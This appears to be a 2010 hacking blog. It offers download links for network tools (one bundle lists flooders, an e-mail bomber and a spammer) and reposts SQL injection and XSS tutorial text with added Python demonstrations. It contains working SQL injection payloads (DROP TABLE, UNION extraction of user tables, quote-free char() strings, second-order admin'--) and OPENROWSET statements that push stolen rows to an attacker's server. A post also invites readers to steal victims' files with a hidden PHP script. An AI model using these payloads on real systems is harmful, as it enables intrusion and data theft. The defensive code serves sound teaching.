Sunday, December 26, 2010

Wireshark

Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features

Wireshark has a rich feature set which includes the following:
  • Deep inspection of hundreds of protocols, with more being added all the time
  • Live capture and offline analysis
  • Standard three-pane packet browser
  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  • Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
  • The most powerful display filters in the industry
  • Rich VoIP analysis
  • Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
  • Capture files compressed with gzip can be decompressed on the fly
  • Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
  • Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
  • Coloring rules can be applied to the packet list for quick, intuitive analysis
  • Output can be exported to XML, PostScript®, CSV, or plain text 

download :
1. user guides : http://www.mediafire.com/?r68z73w3j14553c
2. download software : http://www.mediafire.com/?a7fnjwo2mqv3qwn

Tuesday, December 21, 2010

Net Tools 5



Net Tools is security and network monitoring software for the Internet and local area networks. It bundles network scanning, security, file, system and administrator tools that are useful for diagnosing networks and for monitoring a PC's network connections. Next to the essential core tools it includes many extra file and system utilities; the menus are fully configurable, so you do not get lost in the large number of tools. The latest version is hybrid: it can work together with applications written specifically for Net Tools, which gives more flexibility. The software is designed for Microsoft Windows (Windows 98, NT, 2000, 2003, XP, Vista) and has been tested most thoroughly on Windows XP. With 175+ tools, Net Tools 5.0.70 is about 25 MB in size.
Contents

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

download :  http://www.mediafire.com/?aolilumh9gxvnsm

Sunday, December 19, 2010

NetCut 3

NetCut is a tool that lets you administer your network purely through the ARP protocol. It lists the LAN's IP-MAC table in seconds and can switch network access on or off for any computer on your LAN, including devices such as routers and switches. NetCut can also protect a user from ARP spoofing attacks.
Cut-off: the enhanced cut-off function is built on a pure ARP kernel; no one can escape being cut off unless they also have NetCut installed with its protection function enabled.

Easy to use: one click protects the user's computer, after which no one on the network can cut you off with ARP spoofing.
Effective: one click cuts any computer's network connection to the gateway.
Fast: gets the IP addresses of all computers in your LAN in seconds.
High applicability: works in office LANs, school LANs and even ISP LANs.
Take any computer on the LAN online or offline remotely.
Safe: advertised as trace-free. Note that both the cut-off and the protection work by manipulating ARP, so a host that monitors its own ARP table will still see the gateway's IP suddenly mapped to a different MAC address.
More stable: works on any Ethernet LAN, whether built on switches, hubs or plain cables.

NetCut  3 is licensed as Freeware for the Windows operating system / platform. NetCut is provided as a free download for all software users (Freeware).

download : http://www.mediafire.com/?lco7og0plqgg3qv

Cain & Abel sniffing software

Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security weaknesses present in protocol standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, but it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else who plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damage and/or loss of data using this software, and that in no event shall the author be liable for such damage or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and  some not so common utilities related to network and system security.
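Both NetCut's cut-off/protection and Cain & Abel's APR work at the ARP layer, by answering for an IP address with a MAC of the sender's choosing. As an added example (not code from either tool), the following Python builds ARP reply frames, parses them, and keeps a watch table that flags any reply claiming an already-known IP with a different MAC, which is the detection half of what a "protect" function has to do. The addresses and frames are constructed for the demo; pinning the gateway up front models the idea that the legitimate mapping is trusted and anything contradicting it is a spoof.

```python
import struct

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply (opcode 2).
    Used here only to construct sample traffic for the demo."""
    ether = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"   # dst, src, EtherType ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)                      # Ethernet, IPv4, 6, 4, reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return ether + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join("%02x" % b for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return opcode, sender_mac, sender_ip

class ArpWatch:
    """IP -> MAC table. Any ARP packet that claims an IP already in the table
    with a different MAC is reported as a spoof (a cut-off or poisoning attempt)."""

    def __init__(self, pinned=None):
        self.table = dict(pinned or {})      # static entries, e.g. the gateway

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None                      # not ARP, or malformed
        opcode, mac, ip = parsed
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac             # first sighting: learn it
            return None
        if known != mac:
            return {"ip": ip, "expected": known, "seen": mac, "opcode": opcode}
        return None

# Constructed addresses for the demo.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:dd:ee:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "aa:bb:cc:dd:ee:02"
ATTACKER_MAC = "de:ad:be:ef:00:01"

def demo():
    """Feed one genuine gateway reply and one forged reply claiming the gateway's IP."""
    watch = ArpWatch(pinned={GATEWAY_IP: GATEWAY_MAC})
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoof = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    return watch.observe(legit), watch.observe(spoof)

if __name__ == "__main__":
    ok, alert = demo()
    print("genuine reply:", ok)
    print("forged reply: ", alert)
```

On a real host the frames would come from a raw socket or a capture file instead of build_arp_reply(); the table logic is unchanged. Learning the first mapping seen (rather than pinning it) is the weak spot: an attacker who is first to answer gets trusted, which is why static entries for the gateway matter.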

download : http://www.mediafire.com/?9p91cz3hvg1o0vo

Monday, July 5, 2010

Web Application Security : Solutions

4 Solutions
 
4.1 Some Ideas

There are a number of ideas for fixing these two security problems. The basic approach is to create a library of ASP functions which can be used without much hassle. The advantage is that it is very easy to use. But it is not the best way, because you need to think of it every time you read a request parameter: the one place where you forget to use these functions may be the door for an attacker. The other major disadvantage is that it requires a system for code sharing to ensure that every Web application uses the current functions.
Combined with the ASP functions it is possible to create a checker tool that reads the source files on the server and tries to detect the parameters which are not checked. This could even be automated using command line options and/or a configuration file.
Another idea that floated around in my head was to create an ISAPI filter, so that you do not have to rewrite the applications. This would be a great advantage, but it has some disadvantages. The most serious problem is that inside the ISAPI filter you cannot know whether a given query must be protected against SQL injection or against cross-site scripting. As we have seen, both need different filtering. It might be possible to solve this using some configuration files. I have decided not to dig into this for the moment, because it would be quite time consuming.
As I find the idea of the checker tool very appealing, I decided to implement the ASP functions and a checker tool.
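As an added example (not the paper's checker), here is a minimal version of the checker idea in Python. It scans ASP source for Request(...), Request.QueryString(...), Request.Form(...) and Request.Cookies(...) reads and reports those that are not passed directly to one of the sanitising functions. The wrapper names SafeSqlString, SafeInt and so on are placeholders for the paper's ASP library (its section 4.2 is not on this page), and the ASP snippet is constructed for the demo.

```python
import re

# Hypothetical names for the paper's sanitising ASP functions (assumption).
SAFE_WRAPPERS = ("SafeSqlString", "SafeInt", "SafeLong", "SafeDate", "SafeHtml")

# Matches Request("x"), Request.QueryString("x"), Request.Form("x"), Request.Cookies("x").
REQUEST_RE = re.compile(
    r'Request(?:\.(?:QueryString|Form|Cookies|ServerVariables))?\s*\(\s*"([^"]+)"\s*\)')

# Constructed ASP page for the demo: two parameters are wrapped, two are not.
SAMPLE_ASP = '''<%
Dim term, page, name
term = SafeSqlString(Request.QueryString("term"))
page = SafeInt(Request("page"))
name = Request.Form("name")
sql = "SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE '%" & Request("q") & "%'"
Response.Write "Hello " & name
%>'''

def find_unchecked_params(source, wrappers=SAFE_WRAPPERS):
    """Return (line number, parameter name, source line) for every Request read
    that is not the direct argument of one of the sanitising wrappers."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in REQUEST_RE.finditer(line):
            # Wrapped only when "SafeX(" immediately precedes the Request call.
            before = line[:match.start()].rstrip()
            wrapped = any(before.endswith(name + "(") for name in wrappers)
            if not wrapped:
                findings.append((lineno, match.group(1), line.strip()))
    return findings

def format_report(path, findings):
    return ["%s:%d: Request parameter %r used unchecked: %s" % (path, lineno, param, text)
            for lineno, param, text in findings]

if __name__ == "__main__":
    import sys
    # With file paths on the command line the real files are scanned,
    # otherwise the constructed sample is used.
    sources = [(p, open(p).read()) for p in sys.argv[1:]] or [("sample.asp", SAMPLE_ASP)]
    for path, src in sources:
        for line in format_report(path, find_unchecked_params(src)):
            print(line)
```

The check is deliberately syntactic: a value that is sanitised on a later line, or sanitised through a differently named helper, is still reported, which errs on the side of listing every unwrapped read for a human to look at rather than missing one.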

Web Application Security : SQL Injection and Attack Demonstration

2. SQL Injection
Now to the more dangerous part: SQL injection. This is a technique which allows
the attacker to execute malicious SQL statements. With the help of xp_cmdshell
it’s even possible to execute system commands if the database is accessed as ’sa’.
This bug exists whenever you use unvalidated data that has been submitted by
the client to perform a database query. Let’s take this SQL-Statement, where the
string “TERM” can be submitted by the visitor.

     SELECT NewsId, NewsTitle
     FROM T_News
     WHERE NewsTitle LIKE '%TERM%'

The client could craft the term to drop the table T_News:
 
     SELECT NewsId, NewsTitle
     FROM T_News
     WHERE NewsTitle LIKE '%';
     DROP TABLE T_News --'

Yes, this is possible. Just submit '; DROP TABLE T_News -- as the search term.
First the WHERE clause is closed with the single quote, and then we can start the
next statement with the semicolon. The two dashes at the end start a comment,
so the single quote which the developer has inserted after the user’s input doesn’t
produce a syntax error.
It’s also possible to select any other data and display it instead of the News which
the developer wanted to display on this page. You can use the UNION statement for
that. The only requirement is that both queries return the same number of columns
and the same data type in each column. If necessary use CONVERT to achieve that.
[1] shows a trick for finding out how many columns the query returns, using the
HAVING clause. One example of a UNION attack:

     SELECT NewsId, NewsTitle
     FROM T_News
     WHERE NewsTitle LIKE '%DOESNOTEXIST'
     UNION SELECT UserId, UserName
     FROM T_User --%'


 2.1 Protection: Approach I

Filter characters
Luckily this attack is much easier to protect against than cross-site scripting. Make sure to remove or escape all single quotes in string parameters. Additionally, enforce that any numeric input is really numeric using the IsNumeric function call. The ASP functions (see section 4.2) include some generic functions that protect you from SQL injection attacks if you use them every time. The numeric and date functions check that the input data is valid and then explicitly convert it with CInt, CLng, CDate, etc.

2.2 Protection: Approach II

ADODB Command
There is another approach which is very safe but more work to implement [12]. You can use ADODB prepared statements (the ADODB Command object) so that the data is passed as parameters and is never spliced into the SQL text. See appendix D for an example.
Please note that in the example I have still checked the numeric parameters. This is not strictly required, but if you leave it out you get some nasty error messages:
"Application uses a value of the wrong type for the current operation."
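Added example (not from the paper): the news search above, rebuilt in Python on an in-memory sqlite database standing in for SQL Server, with the UNION extraction and the stacked DROP TABLE payload run against the concatenated query, followed by the two protections: the quote-doubling and IsNumeric-style check of Approach I, and a parameterised query in place of the ADODB Command of Approach II. Table contents are constructed. sqlite's execute() refuses a second statement in one call, so the batch behaviour of SQL Server is modelled with executescript().

```python
import sqlite3

def make_db():
    """Constructed sample schema mirroring the paper's T_News / T_User tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE T_News (NewsId INTEGER, NewsTitle TEXT);
        CREATE TABLE T_User (UserId INTEGER, UserName TEXT, Password TEXT);
        INSERT INTO T_News VALUES (1, 'Site launched'), (2, 'Maintenance window');
        INSERT INTO T_User VALUES (1, 'admin', 'r00tr0x!'), (2, 'guest', 'guest');
    """)
    return db

def table_exists(db, name):
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                     (name,)).fetchone()
    return row is not None

# --- the vulnerable pattern: TERM pasted straight into the statement ---------
def build_search_sql(term):
    return "SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE '%" + term + "%'"

def search_news_vulnerable(db, term):
    return db.execute(build_search_sql(term)).fetchall()

def union_attack(db):
    # DOESNOTEXIST empties the legitimate half; the UNION half reads T_User.
    # Column count and types (int, text) line up, as the paper requires.
    payload = "DOESNOTEXIST' UNION SELECT UserId, UserName FROM T_User --"
    return search_news_vulnerable(db, payload)

def drop_table_attack(db):
    # Stacked statement. SQL Server runs the whole batch; sqlite's execute()
    # refuses a second statement, so executescript() models the batch here.
    payload = "'; DROP TABLE T_News --"
    db.executescript(build_search_sql(payload))
    return table_exists(db, "T_News")      # False once the attack has run

# --- Approach I: filter characters -----------------------------------------
def escape_sql_string(value):
    # Double every single quote so the string literal cannot be closed early.
    return value.replace("'", "''")

def to_int_strict(value):
    # The IsNumeric + CInt idea: refuse anything that is not a plain integer.
    stripped = value.strip()
    if not stripped.lstrip("-").isdigit():
        raise ValueError("not a numeric parameter: %r" % value)
    return int(stripped)

def search_news_escaped(db, term):
    return db.execute(build_search_sql(escape_sql_string(term))).fetchall()

# --- Approach II: parameterised query (the ADODB Command equivalent) --------
def search_news_parameterised(db, term):
    sql = "SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("UNION attack leaks:", union_attack(db))
    print("escaped search returns:", search_news_escaped(db, "' UNION SELECT UserId, UserName FROM T_User --"))
    print("T_News still exists after parameterised search:",
          search_news_parameterised(db, "'; DROP TABLE T_News --") == [] and table_exists(db, "T_News"))
    print("T_News exists after stacked attack:", drop_table_attack(db))
```

The escaping approach depends on every string parameter going through escape_sql_string and every numeric one through to_int_strict; the parameterised version has no such per-call obligation, which is the reason the paper calls it the safer but more laborious route.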

Monday, June 28, 2010

Web Application Security

1. Cross-Site Scripting

Cross-site scripting (XSS) is a threat where the attacker can inject code into a Web application which then gets executed at the visitor's site. This is possible whenever the input of one user gets displayed on the Web site again, for example in guest books. This attack can be used to exploit browser bugs like buffer overflows and ActiveX flaws, or to steal cookies.

1.1 Protection: Approach I
      Filter HTML Characters
The simplest approach to disable cross-site scripting is the filtering of HTML characters:
         > = &gt;
         < = &lt;
         " = &quot;
         & = &amp;
If you put this sanitized text in an HTML environment it should keep you safe from cross-site scripting bugs. But imagine this code:
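The code the sentence above goes on to discuss is not on this page. As an added example (not from the paper), the following Python puts the four-character filter from the table into a function, uses it in an HTML body context where it is sufficient, and then shows one case where the same filter is not enough: in a URL attribute, a javascript: payload contains none of the four characters and passes the filter untouched, so that context needs a scheme allowlist in addition. The guest-book template and the function names are my own.

```python
# The paper's four replacements, '&' first so that the entities produced by the
# later replacements are not themselves re-encoded.
HTML_ESCAPES = (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"), ('"', "&quot;"))

def escape_html(text):
    for raw, entity in HTML_ESCAPES:
        text = text.replace(raw, entity)
    return text

def render_guestbook_entry(name, message):
    # HTML body context (the guest-book case): escaped input is inert here.
    return "<li><b>%s</b>: %s</li>" % (escape_html(name), escape_html(message))

def render_homepage_link(url):
    # href context: a javascript: URL has none of the four characters, so the
    # filter passes it through and the link still runs script when clicked.
    return '<a href="%s">homepage</a>' % escape_html(url)

def render_homepage_link_safe(url):
    # Hardened form: only absolute http(s) URLs are accepted, then the value
    # is escaped for the attribute. Anything else (javascript:, data:, relative
    # paths) is replaced by a harmless "#".
    scheme = url.strip().lower().split(":", 1)[0]
    if scheme not in ("http", "https"):
        url = "#"
    return '<a href="%s">homepage</a>' % escape_html(url)

def carries_script(rendered):
    """Crude oracle for the demo: does executable script survive in the output?"""
    low = rendered.lower()
    return "<script" in low or 'href="javascript:' in low

if __name__ == "__main__":
    print(render_guestbook_entry("eve", "<script>alert(1)</script>"))
    print(render_homepage_link("javascript:alert(1)"))        # still dangerous
    print(render_homepage_link_safe("javascript:alert(1)"))   # neutralised
```

The point the two link functions make is that the filter is a per-context tool: it answers "can this text break out of the surrounding HTML?" and nothing else, so a value that will land inside a URL, a script block or an event handler needs its own rule in addition to the entity replacement.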

Wednesday, June 23, 2010

Taking files from the client computer using a PHP script, by Tomero

Before I explain the content of this title, I ask that what is practised here not be used as something negative against other people. If you want to practise it with evil intent, none of it is my responsibility.

Okay, back to the topic. You certainly would not expect that I could know what lies behind the data you save on your computer. I do not need to call a shaman and stay up all day waiting for the shaman to finish his work, he.. he.. he. Did you know? With the following PHP script, the files that exist on the client computer can be retrieved easily and tucked away on your server. It is enough to trick the victim into opening a site into which this script has been inserted; it will then automatically retrieve (upload) them to the server path of your choice. Here's the script:


Friday, June 18, 2010

ELEVATING PRIVILEGES & UPLOADING FILES:

Often an administrator will follow security best-practices and configure the application to use a
non-privileged login. Having found a vulnerability with the non-privileged login, an attacker will
attempt to elevate privileges to gain full administrator privileges. An attacker could exploit known
and unknown vulnerabilities to do so. Given the number of recent vulnerabilities discovered in
SQL Server, if an attacker can execute arbitrary queries, it is relatively easy to elevate privileges.
Published advisories can be viewed at:
http://www.appsecinc.com/cgi-bin/show_policy_list.pl?app_type=1&category=3
http://www.appsecinc.com/resources/alerts/mssql/


Tuesday, June 15, 2010

RETRIEVING RESULTS FROM SQL INJECTION:

The functions OPENROWSET and OPENDATASOURCE are most commonly used to pull data into SQL Server to be manipulated. They can, however, also be used to push data to a remote SQL Server. OPENROWSET can be used not only to execute SELECT statements, but also to execute UPDATE, INSERT and DELETE statements on external data sources. Performing data manipulation on remote data sources is less common and only works if the OLEDB provider supports this functionality. The SQLOLEDB provider supports all these statements.

Below is an example of pushing data to an external data source:

insert into
    OPENROWSET('SQLoledb',
               'server=servername;uid=sa;pwd=h8ck3r',
               'select * from table1')
select * from table2


In the example above, all rows in table2 on the local SQL Server will be appended to table1 in the
remote data source. In order for the statement to execute properly the two tables must have the
same structure.
As we learned in the previous section, remote datasources can be redirected to any server of the
attacker’s choice. An attacker could change the statement above to connect to a remote
datasource such as a copy of Microsoft SQL Server running on the attacker’s machine.

Friday, June 11, 2010

DETECTION OF SQL INJECTION VULNERABILITIES

Many developers and web administrators are complacent about SQL injection vulnerabilities if the attacker cannot see the SQL error messages and/or cannot return the query's results directly to the browser. This topic was first addressed in a white paper written by Chris Anley of NGSSoftware (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf). This paper will expand on possible ways this threat can be used.
When trying to exploit SQL injection in an application, an attacker needs a method of determining whether the injected SQL is executed on the server, as well as a method of retrieving the results. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET and OPENDATASOURCE functions allow a user in SQL Server to open remote data sources; they open a connection to an OLEDB provider. The OPENROWSET function will be used in all the examples, but the OPENDATASOURCE function could be used with the same results.
This statement will return all the rows of table1 on the remote data source:

select * from
    OPENROWSET('SQLoledb',
               'server=servername;uid=sa;pwd=h8ck3r',
               'select * from table1')


Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement

Tuesday, June 8, 2010

Advanced SQL Injection In SQL Server Applications part 4

[Advanced SQL Injection]
It is often the case that a web application will 'escape' the single quote character (and others), and otherwise 'massage' the data that is submitted by the user, such as by limiting its length.
In this section, we discuss some techniques that help attackers bypass some of the more obvious defences against SQL injection, and evade logging to a certain extent.
[Strings without quotes]
Occasionally, developers may have protected an application by (say) escaping all 'single quote' characters, perhaps by using the VBScript 'replace' function or similar:
function escape( input )
    input = replace(input, "'", "''")
    escape = input
end function
Admittedly, this will prevent all of the example attacks from working on our sample site, and removing ';' characters would also help a lot. However, in a larger application it is likely that several values that the user is supposed to input will be numeric. These values will not require 'delimiting', and so may provide a point at which the attacker can insert SQL.
If the attacker wishes to create a string value without using quotes, they can use the 'char' function. For example:
insert into users values( 666,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
0xffff)
…is a query containing no quote characters, which will insert strings into a table.
Of course, if the attacker doesn't mind using a numeric username and password, the following statement would do just as well:
insert into users values( 667,
123,
123,
0xffff)
Since SQL Server automatically converts integers into 'varchar' values, the type conversion is implicit.
[Second-Order SQL Injection]
Even if an application always escapes single - quotes, an attacker can still inject SQL as long as data in the database is re-used by the application.
For example, an attacker might register with an application, creating a username
Username: admin'--
Password: password
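As an added example (not from the paper), the following Python, with sqlite3 standing in for SQL Server, shows both bypasses described above: a numeric parameter that is escaped but not delimited, into which the string 'admin' is smuggled with char() and no quote characters (sqlite's char() takes a list of code points where SQL Server needs char()+char()+...), and a second-order attack in which the username admin'-- is stored safely at registration and then trusted when a later change-password statement is built from it. The paper's text is cut off after the registration step; the change-password query is my illustration of what "data in the database is re-used by the application" means in practice. The table has the paper's users layout, with ids made distinct so that a numeric lookup is meaningful.

```python
import sqlite3

def make_db():
    """Constructed copy of the paper's users table (distinct ids)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, privs INTEGER);
        INSERT INTO users VALUES (1, 'admin', 'r00tr0x!', 0xffff);
        INSERT INTO users VALUES (2, 'guest', 'guest',    0x0000);
    """)
    return db

def escape(value):
    """The paper's VBScript escape(): double every single quote."""
    return value.replace("'", "''")

# --- Strings without quotes: injection through a numeric parameter ----------
def lookup_user_vulnerable(db, user_id):
    # user_id is "escaped" but never checked to be numeric, and it is not
    # delimited, so the attacker needs no quote characters at all.
    sql = "SELECT username, privs FROM users WHERE id = %s" % escape(user_id)
    return db.execute(sql).fetchall()

# 'admin' spelled without quotes. SQL Server form: char(0x61)+char(0x64)+...
NO_QUOTE_PAYLOAD = "0 OR username = char(0x61,0x64,0x6d,0x69,0x6e)"

def lookup_user_fixed(db, user_id):
    # Numeric parameters get a numeric check and are bound, never concatenated.
    if not user_id.strip().isdigit():
        raise ValueError("id must be numeric")
    return db.execute("SELECT username, privs FROM users WHERE id = ?",
                      (int(user_id),)).fetchall()

# --- Second-order injection ------------------------------------------------
def register_user(db, username, password):
    # First-order input is escaped, so this INSERT is not injectable and the
    # name admin'-- is stored verbatim.
    next_id = db.execute("SELECT max(id) + 1 FROM users").fetchone()[0]
    sql = "INSERT INTO users VALUES (%d, '%s', '%s', 0)" % (
        next_id, escape(username), escape(password))
    db.execute(sql)

def change_password_vulnerable(db, username, old_pw, new_pw):
    # The username is re-read from the database and trusted, so it is pasted
    # into the UPDATE raw. With the stored name admin'-- the WHERE clause
    # becomes  username = 'admin'  and the password check is commented out.
    stored = db.execute("SELECT username FROM users WHERE username = ?",
                        (username,)).fetchone()[0]
    sql = "UPDATE users SET password = '%s' WHERE username = '%s' AND password = '%s'" % (
        escape(new_pw), stored, escape(old_pw))
    db.execute(sql)

def change_password_fixed(db, username, old_pw, new_pw):
    # Data coming back out of the database gets the same treatment as request
    # input: it is bound as a parameter, never spliced into SQL text.
    db.execute("UPDATE users SET password = ? WHERE username = ? AND password = ?",
               (new_pw, username, old_pw))

def get_password(db, username):
    return db.execute("SELECT password FROM users WHERE username = ?",
                      (username,)).fetchone()[0]

if __name__ == "__main__":
    db = make_db()
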